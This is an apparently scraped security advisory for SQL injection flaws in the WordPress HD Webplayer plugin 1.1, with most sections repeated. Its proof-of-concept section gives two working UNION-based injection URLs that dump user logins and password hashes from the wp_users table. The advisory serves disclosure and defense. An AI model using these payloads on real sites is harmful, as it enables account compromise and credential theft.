Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
BID:55259
Info
Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 55259 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 29 2012 12:00AM |
| Updated: | Aug 29 2012 12:00AM |
| Credit: | JoinSe7en |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
The HD Webplayer plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
HD Webplayer 1.1 is vulnerable; other versions may also be affected.
The HD Webplayer plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
HD Webplayer 1.1 is vulnerable; other versions may also be affected.
Exploit / POC
Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following exploit codes are available:
http://www.example.com/wp-content/plugins/hd-webplayer/config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users
http://www.example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users
Attackers can use a browser to exploit these issues.
The following exploit codes are available:
http://www.example.com/wp-content/plugins/hd-webplayer/config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users
http://www.example.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users
Solution / Fix
Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
Wordpress HD Webplayer Plugin Multiple SQL Injection Vulnerabilities
References:
References: